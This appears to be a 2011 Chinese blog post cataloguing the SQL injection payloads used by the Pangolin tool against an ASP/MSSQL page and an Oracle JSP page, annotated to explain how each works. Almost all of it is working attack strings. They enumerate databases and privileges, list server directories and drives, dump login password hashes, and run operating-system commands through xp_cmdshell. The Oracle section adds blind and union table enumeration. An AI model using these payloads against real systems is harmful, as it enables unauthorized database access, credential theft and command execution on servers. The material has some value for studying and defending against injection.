穿山甲(pangolin)注入语句大全(怎么写的?)

Post by mrchen, 2011-4-14, Views:
原创文章如转载,请注明:转载自冠威博客 [ http://www.guanwei.org/ ]
本文链接地址:http://www.guanwei.org/post/securitytools/04/pangolin_sql_injection.html

MSSQL（以下 payload 均为 union 型注入：注入点是字符串参数 newmess.asp?id=70'，原查询返回 3 列，所以 union 子句用 ,null,null 补齐列数；以 ; 开头的语句是堆叠查询，用来建表 / 调用扩展存储过程。xp_cmdshell 等扩展存储过程需要 sysadmin 权限，可先用下文“查privilege”确认）

newmess.asp?id=70' ;

drop table pangolin_test_table;
create table pangolin_test_table([id] [int] identity (1,1) not null,[name] [nvarchar] (300) not null,[depth] [int] not null,[isfile] [nvarchar] (50) null);--

declare @z nvarchar(4000) set @z=0x65003a005c00 insert pangolin_test_table execute master..xp_dirtree @z,1,1--

and 1=2 union all select char(94)+char(94)+char(94)+cast(cast(count(1) as varchar(8000)) as nvarchar(4000))+char(94)+char(94)+char(94),null,null from pangolin_test_table--

and 1=2 union all select char(94)+char(94)+char(94)+cast(cast([isfile] as nvarchar(4000))+char(94)+cast([name] as nvarchar(4000)) as nvarchar(4000))+char(94)+char(94)+char(94),null,null from (select top 1 * from (select top 替换值 [name],[isfile] from pangolin_test_table group by [name],[isfile] order by [isfile]) t order by [isfile] desc,[name] desc) t----
替换值从1开始递增（1,2,3……），每次取出第 N 行；总行数由上一条 count(1) 语句得到，N 超过总行数后查询会重复返回最后一行。xp_dirtree 一句中的 0x65003a005c00 是 UTF-16LE 编码的 e:\，参数 @z,1,1 表示列出该目录下深度为 1 的子目录和文件。

查version
newmess.asp?id=70' and 1=2 union all select char(94)+char(94)+char(94)+cast(@@version as nvarchar(4000))+char(94)+char(94)+char(94),null,null --
char(94)转换后是^：三个 ^ 作为定界符包住查询结果，Pangolin 据此从返回页面中定位并提取数据。用 char() 和十六进制（如后面的 0x7300…6e00）而不是直接写 '^'、'sysadmin' 等字符串，是为了避免在 payload 中出现引号。

查DB name
newmess.asp?id=70' and 1=2 union all select char(94)+char(94)+char(94)+cast(db_name() as nvarchar(4000))+char(94)+char(94)+char(94),null,null --

查Server name
newmess.asp?id=70' and 1=2 union all select char(94)+char(94)+char(94)+cast(@@servername as nvarchar(4000))+char(94)+char(94)+char(94),null,null --

查Host name
newmess.asp?id=70' and 1=2 union all select char(94)+char(94)+char(94)+cast(host_name() as nvarchar(4000))+char(94)+char(94)+char(94),null,null --

查system user
newmess.asp?id=70' and 1=2 union all select char(94)+char(94)+char(94)+cast(system_user as nvarchar(4000))+char(94)+char(94)+char(94),null,null --

查current user
newmess.asp?id=70' and 1=2 union all select char(94)+char(94)+char(94)+cast(user as nvarchar(4000))+char(94)+char(94)+char(94),null,null --

查privilege（0x730079007300610064006d0069006e00 是 UTF-16LE 编码的 sysadmin；is_srvrolemember 返回 1 表示当前登录属于 sysadmin 角色，后文 xp_cmdshell 等操作依赖该权限）
newmess.asp?id=70' and 1=2 union all select char(94)+char(94)+char(94)+cast(is_srvrolemember(0x730079007300610064006d0069006e00) as nvarchar(4000))+char(94)+char(94)+char(94),null,null --

查Databases
newmess.asp?id=70' and 1=2 union all select top 1 char(94)+char(94)+char(94)+cast(cast([name] as nvarchar(4000))+char(94)+cast([filename] as nvarchar(4000)) as nvarchar(4000))+char(94)+char(94)+char(94),null,null from (select top 1 dbid,name,filename from (select top 替换值 dbid,name,filename from [master].[dbo].[sysdatabases] order by 1) t order by 1 desc)t--
替换值从1开始递增（1,2,3……），每次取出 sysdatabases 的第 N 行（库名和数据文件路径）；N 超过总行数后查询会重复返回最后一行，即可停止。

查Drives（磁盘驱动器，通过 xp_availablemedia 枚举；原文 Drivers 为笔误）
newmess.asp?id=70' ;drop table pangolin_test_table;--

newmess.asp?id=70' ;create table pangolin_test_table(name nvarchar(255),low nvarchar(255),high nvarchar(255),type nvarchar(255));--

newmess.asp?id=70' ;insert pangolin_test_table exec master.dbo.xp_availablemedia;--

newmess.asp?id=70' and 1=2 union all select top 1 char(94)+char(94)+char(94)+cast(cast([name] as nvarchar(4000))+char(94)+cast([type] as nvarchar(4000)) as nvarchar(4000))+char(94)+char(94)+char(94),null,null from (select top 1 * from (select top 替换值 [name],[low],[high],[type] from pangolin_test_table group by [name],[low],[high],[type] order by [name]) t order by [name] desc)t--
替换值从1开始递增（1,2,3……），每次取出第 N 个驱动器；N 超过总行数后查询会重复返回最后一行，即可停止。

newmess.asp?id=70' ;drop table pangolin_test_table;--

查Local groups（本地组，通过 xp_enumgroups 枚举；原文 Localgroupus 为笔误）
newmess.asp?id=70' ;drop table pangolin_test_table;--

newmess.asp?id=70' ;create table pangolin_test_table(name nvarchar(255),description nvarchar(4000));--

newmess.asp?id=70' ;insert pangolin_test_table exec master.dbo.xp_enumgroups;--

newmess.asp?id=70' and 1=2 union all select top 1 char(94)+char(94)+char(94)+cast(cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) as nvarchar(4000))+char(94)+char(94)+char(94),null,null from (select top 1 * from (select top 1 [name],[description] from pangolin_test_table group by [name],[description] order by [name]) t order by [name] desc)t--

newmess.asp?id=70' and 1=2 union all select top 1 char(94)+char(94)+char(94)+cast(cast([name] as nvarchar(4000))+char(94)+cast([description] as nvarchar(4000)) as nvarchar(4000))+char(94)+char(94)+char(94),null,null from (select top 1 * from (select top 替换值 [name],[description] from pangolin_test_table group by [name],[description] order by [name]) t order by [name] desc)t--
替换值从1开始递增（1,2,3……），每次取出第 N 个本地组；上一条 top 1 的语句就是 N=1 的情形，N 超过总行数后查询会重复返回最后一行，即可停止。

newmess.asp?id=70' ;drop table pangolin_test_table;--


查users（读取 master..sysxlogins 中的登录名和密码哈希，fn_varbintohexstr 把 varbinary 哈希转成十六进制串；sysxlogins 是 SQL Server 2000 的系统表，2005 及以后版本应改查 sys.sql_logins 的 password_hash。这里只给出了第 1 行，枚举其余行把内层的 top 1 改成替换值即可，用法同上）
newmess.asp?id=70' and 1=2 union all select top 1 char(94)+char(94)+char(94)+cast(cast([name] as nvarchar(4000))+char(94)+isnull(master.dbo.fn_varbintohexstr([password]),char(32)) as nvarchar(4000))+char(94)+char(94)+char(94),null,null from (select top 1 * from (select top 1 [name],[password] from master..sysxlogins where xstatus!=192 order by [name]) t order by [name] desc)t--


获取表（统计用户表数量：xtype=char(85) 即 'U'，表示用户表；status>0 常用于排除系统对象；[metc] 是前面 db_name() 查到的库名，需按实际目标替换）
newmess.asp?id=70' and 1=2 union all select char(94)+char(94)+char(94)+cast(cast(count(1) as varchar(10)) as nvarchar(4000))+char(94)+char(94)+char(94),null,null from [metc]..[sysobjects] where xtype=char(85) and status%3E0--
%3E是>号


执行命令（通过 xp_cmdshell：0x640069007200200063003a005c00 是 UTF-16LE 编码的 dir c:\，命令输出按行写入临时表后再加上自增 id 列。xp_cmdshell 需要 sysadmin 权限，SQL Server 2005 起默认关闭。下面只给出了统计输出行数的语句，逐行读取与前面 top 替换值 的方法相同）
newmess.asp?id=70' ;create table [pangolin_test_table]([resulttxt] nvarchar(4000) null);--

newmess.asp?id=70' ;declare @z nvarchar(4000) set @z=0x640069007200200063003a005c00 insert into [pangolin_test_table](resulttxt) exec master.dbo.xp_cmdshell @z;alter table [pangolin_test_table] add id int not null identity (1,1)--

newmess.asp?id=70' and 1=2 union all select char(94)+char(94)+char(94)+cast(count(1) as nvarchar(4000))+char(94)+char(94)+char(94),null,null from [metc]..[pangolin_test_table]--

newmess.asp?id=70' ;drop table [pangolin_test_table];--

Oracle

盲注猜解（布尔盲注：逐字符取 table_name 的 ascii 值与阈值比较，根据页面真假差异推断字符；%3C= 和 %3E 是 URL 编码的 <= 和 >；行尾的 HTTP/1.1 是抓包时的请求行残留，不属于 payload）

/new/new_content.jsp?dtxx_id=881 and (select ascii(substr(table_name,6,1)) from (select rownum r,table_name from (select rownum r,table_name from user_tables where rownum%3C=1 order by 1 desc) t where r%3E1-1 order by 1)t)>0 and 1=1 HTTP/1.1


用union依次爆出所有的表（union 的列数必须与原查询一致，这里为 1 列；内层 rownum<=N 取前 N 行，倒序后外层用 r>N-1 保留第 N 行，N 逐次加 1）

and 1=3 union select table_name from (select rownum r,table_name from (select rownum r,table_name from user_tables where rownum<=1 order by 1 desc) t where r>0 order by 1)t --

and 1=3 union select table_name from (select rownum r,table_name from (select rownum r,table_name from user_tables where rownum<=2 order by 1 desc) t where r>1 order by 1)t --

and 1=3 union select table_name from (select rownum r,table_name from (select rownum r,table_name from user_tables where rownum<=3 order by 1 desc) t where r>2 order by 1)t --
 
